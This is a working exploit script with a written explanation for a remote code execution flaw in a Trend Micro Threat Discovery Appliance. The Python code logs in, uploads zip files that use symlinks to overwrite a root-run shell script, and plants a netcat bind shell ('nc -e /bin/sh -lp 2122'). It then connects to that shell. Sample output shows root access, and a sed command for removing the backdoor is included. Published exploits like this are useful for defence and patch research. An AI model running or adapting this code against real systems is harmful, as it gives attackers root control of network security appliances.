Trend Micro Threat Discovery Appliance 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution

`#!/usr/local/bin/python  
"""  
Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability  
Found by: Steven Seeley of Source Incite & Roberto Suggi Liverani - @malerisch - http://blog.malerisch.net/   
File: TDA_InstallationCD.2.6.1062r1.en_US.iso  
sha1: 8da4604c92a944ba8f7744641bce932df008f9f9  
Download: http://downloadcenter.trendmicro.com/index.php?regs=NABU&clk=latest&clkval=1787&lang_loc=1  
  
Summary:  
========  
  
The vulnerabity is that the dlp_policy_upload.cgi allows the upload of a zip file, located statically as: /var/dlp_policy.zip.  
The problem is that we can then get that file extracted using admin_dlp.cgi. This gets extracted into 2 locations:  
  
- /eng_ptn_stores/prod/sensorSDK/data/  
- /eng_ptn_stores/prod/sensorSDK/backup_pol/  
  
We can then use symlinks to craft a symlinked that points to /opt/TrendMicro/MinorityReport/bin/  
  
ls -la /eng_ptn_stores/prod/sensorSDK/data/si  
lrwxrwxrwx 1 root root 35 Sep 3 01:22 /eng_ptn_stores/prod/sensorSDK/data/si -> /opt/TrendMicro/MinorityReport/bin/  
  
Then, all we do is create /eng_ptn_stores/prod/sensorSDK/data/si/dlp_kill.sh with malicious code and get it executed...  
  
Notes:  
======  
  
- For this particular PoC, all I did was exec a bind shell using netcat showing that there is no firewall protections...  
- Auth is bypassed in case mr_me0410, so we can attack this with the default password...  
  
Exploitation  
============  
  
This is a clever trick, basically, we cant traverse since unzip checks for ../ (even though spec says its ok).  
We can still exploit this however by extracting a symlink to say a directory and then write into that directory.  
  
For example, if you wanted to link to /tmp you would  
  
ln -s /tmp/ pwn  
zip --symlinks -r foo.zip pwn   
  
Now foo.zip contains the symlink to /tmp. Once this is extracted, the symlink will be written to disk.  
All we need todo now is create another zip file with the folder and file...  
  
zip -r foo.zip pwn/hax.txt  
  
Now after extracting foo.zip, we will write hax.txt into /tmp. Of course, we can automate this magic via python.  
  
So, in summary, the steps to attack this target are:  
  
1. Bypass auth via case mr_me0410  
2. upload a zip with a symlink   
3. trigger extraction, crafting the malicious symlink  
4. upload another zip with the malicious dlp_kill.sh file  
5. trigger extraction, the symlink fires and crushs /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
6. trigger the execution of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh via admin_dlp.cgi  
  
Greetz to the busticati, you know who you are. My home boys.  
  
saturn:trend_micro_threat_discovery_dlp_policy_upload_rce mr_me$ ./poc.py   
(+) usage: ./poc.py <target> <pass>  
(+) eg: ./poc.py 172.16.175.123 admin  
saturn:trend_micro_threat_discovery_dlp_policy_upload_rce mr_me$ ./poc.py 172.16.175.123 admin123  
(+) logged into the target...  
(+) performing initial preflight attack...!  
(+) uploading the zipped symlink...  
(+) successfuly uploaded the zipped symlink  
(+) extracting the symlink...  
(+) extracted the symlink!  
(+) uploading the zipped dlp_kill.sh...  
(+) successfuly uploaded the zipped log_cache.sh  
(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/...  
(+) extracted the dlp_kill.sh file!  
(+) starting backdoor...  
(+) backdoor started !  
(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !  
(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
id  
uid=0(root) gid=0(root)  
uname -a  
Linux localhost 2.6.24.4 #1 SMP Wed Oct 13 14:38:44 CST 2010 i686 unknown  
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
#!/bin/sh  
  
kill `pidof sensorworker sensormain`  
for i in `seq 0 4`;  
do  
sleep 1;  
sid=`pidof sensormain`  
if [ "$sid" -eq "" ]; then  
break  
else  
if [ $i -eq 4 ]; then  
kill -9 $sid  
fi  
fi  
done  
`nc -e /bin/sh -lp 2122>/dev/null`  
sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
cat /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
#!/bin/sh  
  
kill `pidof sensorworker sensormain`  
for i in `seq 0 4`;  
do  
sleep 1;  
sid=`pidof sensormain`  
if [ "$sid" -eq "" ]; then  
break  
else  
if [ $i -eq 4 ]; then  
kill -9 $sid  
fi  
fi  
done  
exit  
  
Cleanup:  
========  
  
We just use "sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh" to remove the last line  
of the script (the backdoor).  
"""  
import os  
import sys  
import time  
import zipfile  
import requests  
import threading  
from cStringIO import StringIO  
  
requests.packages.urllib3.disable_warnings()  
  
def _get_bd():  
bd = """#!/bin/sh  
  
kill `pidof sensorworker sensormain`  
for i in `seq 0 4`;  
do  
sleep 1;  
sid=`pidof sensormain`  
if [ "$sid" -eq "" ]; then  
break  
else  
if [ $i -eq 4 ]; then  
kill -9 $sid  
fi  
fi  
done  
`%s>/dev/null`  
""" % c  
return bd  
  
def _build_zip(CREATE_SYMLINK=False):  
"""  
builds the zip file using a symlink attack into a folder...  
so we symlink the /opt/TrendMicro/MinorityReport/bin/ directory  
and then crush the dlp_kill.sh only to then later get it executed  
resulting in rce as root.  
"""  
if CREATE_SYMLINK:  
zipinfo = zipfile.ZipInfo()  
zipinfo.filename = u'si'  
zipinfo.external_attr |= 0120000 << 16L # symlink file type  
zipinfo.compress_type = zipfile.ZIP_STORED  
f = StringIO()  
z = zipfile.ZipFile(f, 'w', zipfile.ZIP_DEFLATED)  
if CREATE_SYMLINK:  
z.writestr(zipinfo, "/opt/TrendMicro/MinorityReport/bin/")  
else:  
zipinfo = zipfile.ZipInfo("si/dlp_kill.sh")  
zipinfo.external_attr = 0777 << 16L # give full access to included filezipinfo  
  
# backdooring code, as we do  
z.writestr(zipinfo, _get_bd())  
z.close()  
test = open('hax.zip','wb')  
test.write(f.getvalue())  
test.close()  
return f.getvalue()  
  
def we_can_upload_a_zip(CREATE_SYMLINK=False):  
"""  
uploads a zip file with php code inside to our target for exploitation  
"""  
multiple_files = {  
'Q_UPLOAD_ID': (None, ''),  
'binary1': ('pwn.zip', _build_zip(CREATE_SYMLINK), 'application/zip'),  
'submit': (None, 'Import')   
}  
r = s.post(upload_url, files=multiple_files, verify=False)  
if r.status_code == 200:  
return True  
return False  
  
def unzip():  
try:  
r = s.post(unzip_url, data={"act":"save","upload_status":"0"}, verify=False)  
except:  
pass  
return True  
  
def we_can_login():  
r = s.post(login_url, data={ "passwd":p, "isCookieEnable":1 }, verify=False)  
if "frame.cgi" in r.text:  
return True  
return False  
  
def main():  
global c, s, t, p, login_url, unzip_url, upload_url  
if len(sys.argv) != 3:  
print "(+) usage: %s <target> <pass>" % sys.argv[0]  
print "(+) eg: %s 172.16.175.123 admin" % sys.argv[0]  
sys.exit(-1)  
t = sys.argv[1]  
p = sys.argv[2]  
bu = "https://%s/" % t  
login_url = "%scgi-bin/logon.cgi" % bu  
unzip_url = "%scgi-bin/admin_dlp.cgi" % bu  
upload_url = "%scgi-bin/dlp_policy_upload.cgi" % bu  
s = requests.Session()  
  
# 1st we bypass auth and login  
if we_can_login():  
  
# we just use a bind, demonstrating that the target doesnt even have a proper firewall!  
c = "nc -e /bin/sh -lp 2122"  
print "(+) logged into the target..."  
print "(+) performing initial preflight attack...!"  
print "(+) uploading the zipped symlink..."  
  
# 2nd we upload symlink attack  
if we_can_upload_a_zip(CREATE_SYMLINK=True):  
print "(+) successfuly uploaded the zipped symlink"  
print "(+) extracting the symlink..."  
  
# 3rd we extract it  
unzip()  
print "(+) extracted the symlink!"  
time.sleep(2) # let the server process things  
print "(+) uploading the zipped dlp_kill.sh..."  
  
# 4th we upload the backdoor  
if we_can_upload_a_zip(CREATE_SYMLINK=False):  
print "(+) successfuly uploaded the zipped log_cache.sh"  
print "(+) extracting the dlp_kill.sh to /opt/TrendMicro/MinorityReport/bin/..."  
  
# 5th extract the backdoor, crushing /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
unzip()  
print "(+) extracted the dlp_kill.sh file!"  
print "(+) starting backdoor..."  
  
# 6th we trigger the exec of /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh  
thread = threading.Thread(target=unzip, args=())  
thread.daemon = True  
thread.start()  
print "(+) backdoor started !"  
print "(+) dont forget to clean /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh !"  
print "(+) run: sed -i '$ d' /opt/TrendMicro/MinorityReport/bin/dlp_kill.sh"  
time.sleep(2)  
os.system("nc %s 2122" % t)  
if __name__ == '__main__':  
main()  
`